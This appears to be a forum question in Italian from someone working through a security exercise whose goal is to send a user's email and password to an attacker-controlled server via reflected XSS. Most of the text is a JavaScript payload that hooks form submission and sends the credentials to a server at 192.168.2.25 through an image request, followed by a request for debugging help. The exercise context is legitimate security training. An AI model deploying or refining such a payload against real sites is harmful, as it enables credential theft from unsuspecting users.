Sto cercando di risolvere questo esercizio .
L'obiettivo è "Postare il nome utente e la password sul server controllato dell'attaccante".
C'è un parametro url
che il server prende e viene riflesso sulla pagina. Quale è quello che dobbiamo usare come vettore XSS.
Ora, ho scritto uno script come questo:
<script type="text/javascript">
function HijackCred() {
var email = document.forms[0].elements[0].value;
var pass = document.forms[0].elements[1].value;
img = document.createElement("img");
img.src = "http://192.168.2.25:8080?" + "email=" + email + "&" + "password=" + pass;
}
document.forms[0].onsubmit = HijackCred;
</script>
L'iniezione funziona bene, poiché riesco a vedere lo script riflesso sulla pagina. Tuttavia, il payload dello script non invia le credenziali al server controllato da un utente malintenzionato. Qualche suggerimento?